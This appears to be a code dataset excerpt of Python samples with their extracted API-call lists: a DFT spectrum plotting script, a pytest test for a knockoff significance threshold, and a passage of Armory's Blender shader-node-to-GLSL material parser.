| [((2340, 2361), 'riscv_ctg.log.logger.level', 'logger.level', (['verbose'], {}), '(verbose)\n', (2352, 2361), False, 'from riscv_ctg.log import logger\n'), ((2458, 2524), 'riscv_ctg.log.logger.info', 'logger.info', (['"""Copyright (c) 2020, InCore Semiconductors Pvt. Ltd."""'], {}), "('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')\n", (2469, 2524), False, 'from riscv_ctg.log import logger\n'), ((2529, 2564), 'riscv_ctg.log.logger.info', 'logger.info', (['"""All Rights Reserved."""'], {}), "('All Rights Reserved.')\n", (2540, 2564), False, 'from riscv_ctg.log import logger\n'), ((2569, 2623), 'riscv_ctg.log.logger.info', 'logger.info', (['"""Copying env folder to Output directory."""'], {}), "('Copying env folder to Output directory.')\n", (2580, 2623), False, 'from riscv_ctg.log import logger\n'), ((2638, 2662), 'os.path.join', 'os.path.join', (['out', '"""env"""'], {}), "(out, 'env')\n", (2650, 2662), False, 'import os, re\n'), ((3317, 3353), 'riscv_ctg.utils.load_yaml', 'utils.load_yaml', (['const.template_file'], {}), '(const.template_file)\n', (3332, 3353), True, 'import riscv_ctg.utils as utils\n'), ((3364, 3406), 'riscv_isac.cgf_normalize.expand_cgf', 'expand_cgf', (['cgf_file', 'xlen', 'list_duplicate'], {}), '(cgf_file, xlen, list_duplicate)\n', (3374, 3406), False, 'from riscv_isac.cgf_normalize import expand_cgf\n'), ((3416, 3434), 'multiprocessing.Pool', 'mp.Pool', (['num_procs'], {}), '(num_procs)\n', (3423, 3434), True, 'import multiprocessing as mp\n'), ((1739, 1810), 'riscv_ctg.generator.Generator', 'Generator', (['formattype', 'op_node', 'opcode', 'randomize', 'xlen', 'flen', 'base_isa'], {}), '(formattype, op_node, opcode, randomize, xlen, flen, base_isa)\n', (1748, 1810), False, 'from riscv_ctg.generator import Generator\n'), ((2673, 2696), 'os.path.exists', 'os.path.exists', (['env_dir'], {}), '(env_dir)\n', (2687, 2696), False, 'import os, re\n'), ((2706, 2741), 'shutil.copytree', 'shutil.copytree', (['const.env', 'env_dir'], {}), '(const.env, env_dir)\n', (2721, 2741), False, 'import shutil\n'), ((2845, 2856), 'time.time', 'time.time', ([], {}), '()\n', (2854, 2856), False, 'import time\n')] |
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
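# Note: k0 = 8.5 falls between DFT bins, so the cosine does not complete a
# whole number of cycles in the N = 64 window and its energy leaks across
# neighbouring bins; the IDFT nevertheless reconstructs the signal exactly.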
| [
"matplotlib.pyplot.savefig",
"numpy.ones",
"numpy.arange",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.figure",
"dftModel.dftAnal",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.title",
"sys.path.append",
"dftModel.dftSynth",
"matplotlib.pyplot.show"
]
| [((63, 107), 'sys.path.append', 'sys.path.append', (['"""../../../software/models/"""'], {}), "('../../../software/models/')\n", (78, 107), False, 'import sys\n'), ((164, 174), 'numpy.ones', 'np.ones', (['N'], {}), '(N)\n', (171, 174), True, 'import numpy as np\n'), ((229, 249), 'dftModel.dftAnal', 'DFT.dftAnal', (['x', 'w', 'N'], {}), '(x, w, N)\n', (240, 249), True, 'import dftModel as DFT\n'), ((254, 277), 'dftModel.dftSynth', 'DFT.dftSynth', (['mX', 'pX', 'N'], {}), '(mX, pX, N)\n', (266, 277), True, 'import dftModel as DFT\n'), ((279, 310), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {'figsize': '(9.5, 5)'}), '(1, figsize=(9.5, 5))\n', (289, 310), True, 'import matplotlib.pyplot as plt\n'), ((311, 327), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(311)'], {}), '(311)\n', (322, 327), True, 'import matplotlib.pyplot as plt\n'), ((328, 384), 'matplotlib.pyplot.title', 'plt.title', (['"""positive freq. magnitude spectrum in dB: mX"""'], {}), "('positive freq. magnitude spectrum in dB: mX')\n", (337, 384), True, 'import matplotlib.pyplot as plt\n'), ((474, 490), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(312)'], {}), '(312)\n', (485, 490), True, 'import matplotlib.pyplot as plt\n'), ((491, 537), 'matplotlib.pyplot.title', 'plt.title', (['"""positive freq. phase spectrum: pX"""'], {}), "('positive freq. phase spectrum: pX')\n", (500, 537), True, 'import matplotlib.pyplot as plt\n'), ((584, 621), 'matplotlib.pyplot.axis', 'plt.axis', (['[0, pX.size, -np.pi, np.pi]'], {}), '([0, pX.size, -np.pi, np.pi])\n', (592, 621), True, 'import matplotlib.pyplot as plt\n'), ((621, 637), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(313)'], {}), '(313)\n', (632, 637), True, 'import matplotlib.pyplot as plt\n'), ((638, 676), 'matplotlib.pyplot.title', 'plt.title', (['"""inverse spectrum: IDFT(X)"""'], {}), "('inverse spectrum: IDFT(X)')\n", (647, 676), True, 'import matplotlib.pyplot as plt\n'), ((762, 780), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (778, 780), True, 'import matplotlib.pyplot as plt\n'), ((781, 804), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""idft.png"""'], {}), "('idft.png')\n", (792, 804), True, 'import matplotlib.pyplot as plt\n'), ((805, 815), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (813, 815), True, 'import matplotlib.pyplot as plt\n'), ((394, 412), 'numpy.arange', 'np.arange', (['mX.size'], {}), '(mX.size)\n', (403, 412), True, 'import numpy as np\n'), ((547, 565), 'numpy.arange', 'np.arange', (['pX.size'], {}), '(pX.size)\n', (556, 565), True, 'import numpy as np\n'), ((686, 710), 'numpy.arange', 'np.arange', (['(-N / 2)', '(N / 2)'], {}), '(-N / 2, N / 2)\n', (695, 710), True, 'import numpy as np\n'), ((199, 223), 'numpy.arange', 'np.arange', (['(-N / 2)', '(N / 2)'], {}), '(-N / 2, N / 2)\n', (208, 223), True, 'import numpy as np\n')] |
import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
@pytest.mark.parametrize(
"w, q, offset, expected",
[
([1, 2, 3, 4, 5], 0.1, 0, 1),
([-1, 2, -3, 4, 5], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
(
[-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
0.1,
0,
1.93,
),
],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
w = np.array(w)
threshold = adaptive_significance_threshold(w, q, offset=offset)
assert threshold == expected
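# Informal note (not part of the original test file): the expected values are
# consistent with the knockoff selection threshold, i.e. the smallest t among
# the |w_j| such that (offset + #{j: w_j <= -t}) / max(1, #{j: w_j >= t}) <= q,
# with np.inf returned when no such t exists.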
| [
"fanok.selection.adaptive_significance_threshold",
"pytest.mark.parametrize",
"numpy.array"
]
| [((98, 480), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""w, q, offset, expected"""', '[([1, 2, 3, 4, 5], 0.1, 0, 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1,\n 0, 1, 2, 3], 0.1, 0, np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, \n 9, 10], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], \n 0.15, 0, 3), ([-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, \n 0.31, -1.38], 0.1, 0, 1.93)]'], {}), "('w, q, offset, expected', [([1, 2, 3, 4, 5], 0.1, 0,\n 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3], 0.1, 0,\n np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4), (\n [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3), ([-1.52, \n 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38], 0.1, 0, 1.93)])\n", (121, 480), False, 'import pytest\n'), ((662, 673), 'numpy.array', 'np.array', (['w'], {}), '(w)\n', (670, 673), True, 'import numpy as np\n'), ((690, 742), 'fanok.selection.adaptive_significance_threshold', 'adaptive_significance_threshold', (['w', 'q'], {'offset': 'offset'}), '(w, q, offset=offset)\n', (721, 742), False, 'from fanok.selection import adaptive_significance_threshold\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com';
with requests.get(url) as r:
r.encoding='utf-8'
soup = BeautifulSoup(r.text)
	# Prettify the parsed HTML
pret = soup.prettify();
u = soup.select('#u1 a')
for i in u:
print("名称:%s,地址:%s" % (i.getText(),i.get('href'))) | [
"bs4.BeautifulSoup",
"requests.get"
]
| [((175, 192), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (187, 192), False, 'import requests\n'), ((227, 248), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.text'], {}), '(r.text)\n', (240, 248), False, 'from bs4 import BeautifulSoup\n')] |
#
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
if output_node != None:
parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)
def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
global parsed # Compute nodes only once
global parents
global normal_parsed
global curshader # Active shader - frag for surface / tese for displacement
global con
global vert
global frag
global geom
global tesc
global tese
global parse_surface
global parse_opacity
global basecol_only
global emission_found
global particle_info
global sample_bump
global sample_bump_res
con = _con
vert = _vert
frag = _frag
geom = _geom
tesc = _tesc
tese = _tese
parse_surface = _parse_surface
parse_opacity = _parse_opacity
basecol_only = _basecol_only
emission_found = False
particle_info = {}
particle_info['index'] = False
particle_info['age'] = False
particle_info['lifetime'] = False
particle_info['location'] = False
particle_info['size'] = False
particle_info['velocity'] = False
particle_info['angular_velocity'] = False
sample_bump = False
sample_bump_res = ''
wrd = bpy.data.worlds['Arm']
# Surface
if parse_surface or parse_opacity:
parsed = {}
parents = []
normal_parsed = False
curshader = frag
out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
if parse_surface:
frag.write('basecol = {0};'.format(out_basecol))
frag.write('roughness = {0};'.format(out_roughness))
frag.write('metallic = {0};'.format(out_metallic))
frag.write('occlusion = {0};'.format(out_occlusion))
frag.write('specular = {0};'.format(out_specular))
if '_Emission' in wrd.world_defs:
frag.write('emission = {0};'.format(out_emission))
if parse_opacity:
frag.write('opacity = {0} - 0.0002;'.format(out_opacity))
# Volume
# parse_volume_input(node.inputs[1])
# Displacement
if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
parsed = {}
parents = []
normal_parsed = False
rpdat = arm.utils.get_rp()
if rpdat.arm_rp_displacement == 'Tessellation' and tese != None:
curshader = tese
else:
curshader = vert
out_disp = parse_displacement_input(node.inputs[2])
curshader.write('vec3 disp = {0};'.format(out_disp))
def parse_group(node, socket): # Entering group
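    # Map the group's output socket to the matching input of its internal
    # GROUP_OUTPUT node and parse that; the `parents` stack records the group
    # nesting so that GROUP_INPUT nodes can be resolved on the way back out.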
index = socket_index(node, socket)
output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
if output_node == None:
return
inp = output_node.inputs[index]
parents.append(node)
out_group = parse_input(inp)
parents.pop()
return out_group
def parse_group_input(node, socket):
index = socket_index(node, socket)
parent = parents.pop() # Leaving group
inp = parent.inputs[index]
res = parse_input(inp)
parents.append(parent) # Return to group
return res
def parse_input(inp):
if inp.type == 'SHADER':
return parse_shader_input(inp)
elif inp.type == 'RGB':
return parse_vector_input(inp)
elif inp.type == 'RGBA':
return parse_vector_input(inp)
elif inp.type == 'VECTOR':
return parse_vector_input(inp)
elif inp.type == 'VALUE':
return parse_value_input(inp)
def parse_shader_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_shader_input(l.from_node.inputs[0])
return parse_shader(l.from_node, l.from_socket)
else:
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_shader(node, socket):
global emission_found
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
if parse_surface:
# Base color
out_basecol = parse_vector_input(node.inputs[0])
# Occlusion
out_occlusion = parse_value_input(node.inputs[2])
# Roughness
out_roughness = parse_value_input(node.inputs[3])
# Metallic
out_metallic = parse_value_input(node.inputs[4])
# Normal
if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP':
warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly')
parse_normal_map_color_input(node.inputs[5])
# Emission
if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0:
out_emission = parse_value_input(node.inputs[6])
emission_found = True
if parse_opacity:
out_opacity = parse_value_input(node.inputs[1])
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'MIX_SHADER':
prefix = '' if node.inputs[0].is_linked else 'const '
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
fac_inv_var = node_name(node.name) + '_fac_inv'
curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac))
curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var))
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2])
if parse_surface:
out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var)
out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var)
out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var)
out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var)
out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var)
out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var)
if parse_opacity:
out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var)
elif node.type == 'ADD_SHADER':
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1])
if parse_surface:
out_basecol = '({0} + {1})'.format(bc1, bc2)
out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2)
out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2)
out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2)
out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2)
out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2)
if parse_opacity:
out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2)
elif node.type == 'BSDF_PRINCIPLED':
if parse_surface:
write_normal(node.inputs[19])
out_basecol = parse_vector_input(node.inputs[0])
# subsurface = parse_vector_input(node.inputs[1])
# subsurface_radius = parse_vector_input(node.inputs[2])
# subsurface_color = parse_vector_input(node.inputs[3])
out_metallic = parse_value_input(node.inputs[4])
out_specular = parse_value_input(node.inputs[5])
# specular_tint = parse_vector_input(node.inputs[6])
out_roughness = parse_value_input(node.inputs[7])
# aniso = parse_vector_input(node.inputs[8])
# aniso_rot = parse_vector_input(node.inputs[9])
# sheen = parse_vector_input(node.inputs[10])
# sheen_tint = parse_vector_input(node.inputs[11])
# clearcoat = parse_vector_input(node.inputs[12])
# clearcoat_rough = parse_vector_input(node.inputs[13])
# ior = parse_vector_input(node.inputs[14])
# transmission = parse_vector_input(node.inputs[15])
# transmission_roughness = parse_vector_input(node.inputs[16])
if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0:
out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17]))
emission_found = True
# clearcoar_normal = parse_vector_input(node.inputs[20])
# tangent = parse_vector_input(node.inputs[21])
if parse_opacity:
if len(node.inputs) > 20:
out_opacity = parse_value_input(node.inputs[18])
elif node.type == 'BSDF_DIFFUSE':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_specular = '0.0'
elif node.type == 'BSDF_GLOSSY':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'AMBIENT_OCCLUSION':
if parse_surface:
# Single channel
out_occlusion = parse_vector_input(node.inputs[0]) + '.r'
elif node.type == 'BSDF_ANISOTROPIC':
if parse_surface:
write_normal(node.inputs[4])
# Revert to glossy
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'EMISSION':
if parse_surface:
# Multiply basecol
out_basecol = parse_vector_input(node.inputs[0])
out_emission = '1.0'
emission_found = True
emission_strength = parse_value_input(node.inputs[1])
out_basecol = '({0} * {1})'.format(out_basecol, emission_strength)
elif node.type == 'BSDF_GLASS':
if parse_surface:
write_normal(node.inputs[3])
out_roughness = parse_value_input(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_HAIR':
pass
elif node.type == 'HOLDOUT':
if parse_surface:
# Occlude
out_occlusion = '0.0'
elif node.type == 'BSDF_REFRACTION':
# write_normal(node.inputs[3])
pass
elif node.type == 'SUBSURFACE_SCATTERING':
if parse_surface:
write_normal(node.inputs[4])
out_basecol = parse_vector_input(node.inputs[0])
elif node.type == 'BSDF_TOON':
# write_normal(node.inputs[3])
pass
elif node.type == 'BSDF_TRANSLUCENT':
if parse_surface:
write_normal(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_TRANSPARENT':
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_VELVET':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = '1.0'
out_metallic = '1.0'
elif node.type == 'VOLUME_ABSORPTION':
pass
elif node.type == 'VOLUME_SCATTER':
pass
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_displacement_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_displacement_input(l.from_node.inputs[0])
return parse_vector_input(inp)
else:
return None
def parse_vector_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_vector_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return res_var
else: # VALUE
return 'vec3({0})'.format(res_var)
else:
if inp.type == 'VALUE': # Unlinked reroute
return to_vec3([0.0, 0.0, 0.0])
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec3(inp.default_value)
def parse_vector(node, socket):
global particle_info
global sample_bump
global sample_bump_res
# RGB
if node.type == 'GROUP':
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'VERTEX_COLOR':
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
elif node.type == 'ATTRIBUTE':
if socket == node.outputs[0]: # Color
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
else: # Vector
con.add_elem('tex', 'short2norm') # UVMaps only for now
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.attribute_name == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'RGB':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec3(socket.default_value)
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
col3 = parse_vector_input(node.inputs[3])
scale = parse_value_input(node.inputs[4])
res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
scale = parse_value_input(node.inputs[3])
res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_ENVIRONMENT':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.rgb'.format(store_var_name(node))
tex_name = node_name(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB'
res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link))
else:
global parsed
tex_store = store_var_name(node) # Pink color for missing texture
parsed[tex_store] = True
curshader.write_textures += 1
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
curshader.write_textures -= 1
return '{0}.rgb'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
curshader.add_function(c_functions.str_tex_noise)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
# Slow..
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_SKY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'BRIGHTCONTRAST':
out_col = parse_vector_input(node.inputs[0])
bright = parse_value_input(node.inputs[1])
contr = parse_value_input(node.inputs[2])
curshader.add_function(c_functions.str_brightcontrast)
return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr)
elif node.type == 'GAMMA':
out_col = parse_vector_input(node.inputs[0])
gamma = parse_value_input(node.inputs[1])
return 'pow({0}, vec3({1}))'.format(out_col, gamma)
elif node.type == 'HUE_SAT':
curshader.add_function(c_functions.str_hue_sat)
hue = parse_value_input(node.inputs[0])
sat = parse_value_input(node.inputs[1])
val = parse_value_input(node.inputs[2])
fac = parse_value_input(node.inputs[3])
col = parse_vector_input(node.inputs[4])
return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac)
elif node.type == 'INVERT':
fac = parse_value_input(node.inputs[0])
out_col = parse_vector_input(node.inputs[1])
return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac)
elif node.type == 'MIX_RGB':
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
blend = node.blend_type
if blend == 'MIX':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'ADD':
out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'MULTIPLY':
out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SUBTRACT':
